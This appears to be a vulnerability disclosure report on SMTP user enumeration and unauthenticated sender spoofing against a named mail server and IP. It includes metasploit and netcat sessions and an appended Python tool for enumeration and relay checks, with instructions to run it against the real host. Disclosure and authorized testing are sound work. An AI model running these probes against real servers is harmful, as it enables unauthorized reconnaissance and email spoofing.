Hello guys,
I have two related SMTP vulnerabilities. I decided to put both of them under the same ticket because they are closely related.
Summary:
I discovered two SMTP vulnerabilities on host viestinta.lahitapiola.fi. First, it is possible to perform user enumeration. For this you can use metasploit in the following way:
msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set RHOSTS 83.150.127.170
RHOSTS => 83.150.127.170
msf auxiliary(smtp_enum) > run
[*] 83.150.127.170:25 Banner: 220 viestinta.tapiola.fi ESMTP Postfix
[+] 83.150.127.170:25 Users found: , adm, bin, daemon, fax, ftp, games, gdm, gopher, halt, lp, mail, news, nobody, operator, postgres, postmaster, sshd, sync, uucp, webmaster, www
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
With this step we recovered valid users on the system (please note I used the default dictionary which comes with metasploit; I did not attempt to create a wordlist which would discover your personal email addresses, to limit the number of brute force guesses).
The second vulnerability is that an attacker without any authentication can send emails from this SMTP server. Emails are limited to "@viestinta.lahitapiola.fi" only. To reproduce you can use the NetCat utility:
root@kali:~/Android/Sdk/tools# nc -nvv 83.150.127.170 25
(UNKNOWN) [83.150.127.170] 25 (smtp) open
220 viestinta.tapiola.fi ESMTP Postfix
HELO 83.150.127.170
250 viestinta.tapiola.fi
MAIL FROM:<[email protected]>
250 2.1.0 Ok
RCPT TO:<[email protected]>
550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table
RCPT TO:<[email protected]>
550 5.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table
RCPT TO:<[email protected]>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
test
.
250 2.0.0 Ok: queued as 98F9E3F201A1
421 4.4.2 viestinta.tapiola.fi Error: timeout exceeded
 sent 211, rcvd 481
In the NetCat session above you can see I used the fake email address [email protected] to send an email to [email protected] (we discovered this is a valid target in step one, user enumeration). You can see the difference when I tried to send an email to an address which does not exist: "<[email protected]>: Recipient address rejected: User unknown in local recipient table".
From my point of view there are a few problems:
Domain: viestinta.tapiola.fi
https://pentestlab.wordpress.com/2012/11/20/smtp-user-enumeration/ - about SMTP user enumeration
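The two checks in this report (user enumeration through VRFY / RCPT TO reply codes, and an unauthenticated envelope with a forged sender that the server accepts for local users but rejects for outside recipients) can be scripted so they are repeatable and stop before DATA, so nothing is queued. The following is an added example, not code from the report or from metasploit. The domain viestinta.tapiola.fi comes from the banner above; the user list, the sender and recipient addresses, and the MockPostfix stand-in that replays the reply styles seen in the session are constructed for offline use. The 554 "Relay access denied" reply is the Postfix default for reject_unauth_destination and is assumed here, since the report only shows the 250 and 550 replies.

```python
"""Added example (not from the original report): SMTP user enumeration and
sender-spoofing / open-relay checks driven through a pluggable `transact`
function, so the same logic runs against a constructed stand-in or a live socket."""
import smtplib
from typing import Callable, Dict, List, Tuple

Transact = Callable[[str], Tuple[int, str]]  # raw SMTP command -> (reply code, reply text)

TARGET_DOMAIN = "viestinta.tapiola.fi"  # domain from the report's banner
USER_UNKNOWN = "5.1.1"                  # enhanced status Postfix attaches to "User unknown" (seen in the report)


class MockPostfix:
    """Constructed stand-in replaying the reply styles from the report; not a real server."""

    def __init__(self, local_users, allow_relay=False, vrfy_enabled=True):
        self.local_users = set(local_users)
        self.allow_relay = allow_relay
        self.vrfy_enabled = vrfy_enabled
        self.mail_from = None  # envelope state: RCPT before MAIL is a 503, as on real Postfix

    def _lookup(self, addr: str, ok: Tuple[int, str]) -> Tuple[int, str]:
        local, _, domain = addr.partition("@")
        if domain.lower() != TARGET_DOMAIN:
            if self.allow_relay:
                return 250, "2.1.5 Ok"
            return 554, f"5.7.1 <{addr}>: Relay access denied"  # assumed Postfix reject_unauth_destination reply
        if local in self.local_users:
            return ok
        return 550, f"{USER_UNKNOWN} <{addr}>: Recipient address rejected: User unknown in local recipient table"

    def __call__(self, cmd: str) -> Tuple[int, str]:
        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        addr = arg.split(":", 1)[-1].strip().strip("<>")  # "TO:<x@y>" and bare "x@y" both end up as x@y
        if verb in ("HELO", "EHLO"):
            return 250, TARGET_DOMAIN
        if verb == "VRFY":
            if not self.vrfy_enabled:
                return 502, "5.5.1 VRFY command is disabled"
            return self._lookup(addr, (252, f"2.0.0 {addr}"))
        if verb == "MAIL":
            self.mail_from = addr
            return 250, "2.1.0 Ok"
        if verb == "RCPT":
            if self.mail_from is None:
                return 503, "5.5.1 Error: need MAIL command"
            return self._lookup(addr, (250, "2.1.5 Ok"))
        if verb in ("RSET", "QUIT"):
            self.mail_from = None
            return (250, "2.0.0 Ok") if verb == "RSET" else (221, "2.0.0 Bye")
        return 502, "5.5.2 Error: command not recognized"


def enumerate_users(transact: Transact, candidates: List[str], domain: str = TARGET_DOMAIN,
                    envelope_from: str = "probe@example.com") -> Dict[str, object]:
    """Classify candidate local parts by reply code. VRFY is tried first; if the server
    refuses it (502), fall back to RCPT TO, which mirrors real delivery and is what the
    netcat session in the report exercised. Any reply other than 250/252 or 550 5.1.1
    (greylisting, relay refusal, rate limiting) is recorded as undecided, not as absent."""
    transact("EHLO probe.example")
    method, found, unknown, undecided = "VRFY", [], [], []
    for user in candidates:
        addr = f"{user}@{domain}"
        code, text = 0, ""
        if method == "VRFY":
            code, text = transact(f"VRFY {addr}")
            if code == 502:
                method = "RCPT"  # VRFY disabled: switch methods for this and all later candidates
        if method == "RCPT":
            transact("RSET")  # fresh envelope per candidate so recipients do not accumulate
            transact(f"MAIL FROM:<{envelope_from}>")
            code, text = transact(f"RCPT TO:<{addr}>")
        if code in (250, 252):
            found.append(user)
        elif code == 550 and USER_UNKNOWN in text:
            unknown.append(user)
        else:
            undecided.append(user)
    transact("QUIT")
    return {"method": method, "found": found, "unknown": unknown, "undecided": undecided}


def check_spoof_and_relay(transact: Transact, forged_sender: str, local_rcpt: str,
                          external_rcpt: str) -> Dict[str, bool]:
    """Envelope-only checks: does the server accept a forged sender for a local user, and
    does it relay to an outside domain? Stops before DATA so no message is ever queued."""
    transact("EHLO probe.example")
    result = {}
    for key, rcpt in (("forged_sender_to_local_user", local_rcpt), ("open_relay", external_rcpt)):
        transact("RSET")
        transact(f"MAIL FROM:<{forged_sender}>")
        code, _ = transact(f"RCPT TO:<{rcpt}>")
        result[key] = code == 250
    transact("RSET")  # abandon the accepted envelope instead of sending DATA
    transact("QUIT")
    return result


def live_transact(host: str, port: int = 25, timeout: float = 10.0) -> Transact:
    """Same interface over a real connection (authorized testing only); reads the 220 banner on connect."""
    conn = smtplib.SMTP(host, port, timeout=timeout)

    def transact(cmd: str) -> Tuple[int, str]:
        verb, _, arg = cmd.partition(" ")
        code, msg = conn.docmd(verb, arg)
        return code, msg.decode(errors="replace")
    return transact


if __name__ == "__main__":
    # Constructed local users, taken from names the report's metasploit run listed.
    server = MockPostfix(["postmaster", "webmaster", "www", "mail"])
    print(enumerate_users(server, ["webmaster", "postmaster", "alice", "bob"]))
    print(check_spoof_and_relay(server, "forged@example.com",
                                f"webmaster@{TARGET_DOMAIN}", "victim@example.org"))
```

To run against a real host, replace the MockPostfix instance with `live_transact("83.150.127.170")`; the enumeration and envelope checks are unchanged, and because neither function issues DATA the probe leaves nothing in the target's mail queue.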